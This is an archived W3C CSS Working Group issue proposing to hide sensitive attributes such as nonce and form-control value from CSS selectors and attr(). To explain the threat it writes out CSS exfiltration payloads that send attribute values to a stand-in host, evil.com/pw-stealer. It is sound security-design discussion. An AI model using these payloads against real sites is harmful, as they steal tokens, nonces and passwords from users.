[csswg-drafts] [selectors][css-values] Hide "sensitive" attributes from CSS (#5136) from Tab Atkins Jr. via GitHub on 2020-05-29 (public-css-archive@w3.org from May 2020)

From: Tab Atkins Jr. via GitHub <sysbot+gh@w3.org>
Date: Fri, 29 May 2020 17:40:28 +0000
To: public-css-archive@w3.org
Message-ID: <issues.opened-627429757-1590774027-sysbot+gh@w3.org>

tabatkins has just created a new issue for https://github.com/w3c/csswg-drafts:

== [selectors][css-values] Hide "sensitive" attributes from CSS ==
For a long time, data-exfiltration attacks have been possible using CSS attribute selectors; with careful use of a streaming stylesheet, an attacker can start with `input[value^="a"]{background-image:url(https://evil.com/pw-stealer?prefix=a);}` (etc for b-z), then based on that result, stream in another set like `[value^="ha"]`, `[value^="hb"]`, etc, and eventually steal the entire attribute value.

This can be used to get script nonces from a page, csrf tokens from a form, and in some DOM libraries that live-reflect input values into the `value` attribute, can steal usernames and passwords as well.

We have plans to introduce a `url()` variant that can take functions in its value, a `concat()` function for joining strings together, and now have a more powerful `attr()` function that can be used anywhere to fetch the value of an attribute. Combined, these would make the exfiltration attacks trivial; slipping in a simple `style="background-image: fetch(concat("https://evil.com/pw-stealer?pw=", attr(value string)));"` would grab the attribute in one go, no cleverness required beyond the initial CSS injection.

Since "concat a URL fragment with an attr value" is actually one of the *main use-cases* for the concat() function, it would be unfortunate to lose that entirely. And doing so wouldn't stop the more complex exfiltration outlined at the start of this message anyway.

@mikewest, in <https://groups.google.com/a/chromium.org/d/msg/blink-dev/FGCgsKmylhw/A1vw2xREAgAJ>, suggests hiding "sensitive" attributes from CSS entirely: `nonce`, `value` on a form control, possibly others. They wouldn't be matchable with attribute selectors, or allow their value to be extracted with `attr()`.

This seems completely reasonable to me; there's no reasonable use-case for `nonce` to be usable in CSS, and the use-cases for extracting `value` (displaying in an error message displayed in a `::before`?) are weak enough that I'm happy to remove that.

Thoughts?

Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5136 using your GitHub account

Received on Friday, 29 May 2020 17:40:33 UTC